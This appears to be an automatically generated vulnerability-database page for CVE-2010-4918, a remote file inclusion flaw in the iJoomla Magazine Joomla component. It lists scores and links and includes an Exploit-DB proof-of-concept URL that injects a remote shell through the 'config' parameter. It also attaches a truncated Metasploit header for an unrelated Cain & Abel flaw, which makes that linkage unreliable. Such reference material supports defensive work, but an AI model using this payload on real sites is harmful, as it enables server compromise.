CVE-2010-4918
Published: 2011-10-08
Priority: P3 52 | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.40% (82.0th percentile)
PHP remote file inclusion vulnerability in iJoomla Magazine (com_magazine) component 3.0.1 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the config parameter to magazine.functions.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ijoomla | com_magazine | — | — |
No detection rules found.
Exploit-DB
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2008-5405 Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
---
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cain & Abel %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '20
Exploit-DB
Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion
exploitdb·2010-09-05
CVE-2010-4918 Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion
---
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
# Date: [5-9-2010]
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
# Version: [v 3.0.1 ]
# Tested on: [Windows XP]
# CVE : Hacker town of Musayyib
# Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ [email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
Greetings: No
No writeups or analysis indexed.
http://packetstormsecurity.org/1009-exploits/ijoomlamagazine-rfi.txt
http://securityreason.com/securityalert/8451
http://www.exploit-db.com/exploits/14896
https://exchange.xforce.ibmcloud.com/vulnerabilities/61598
Published: 2011-10-08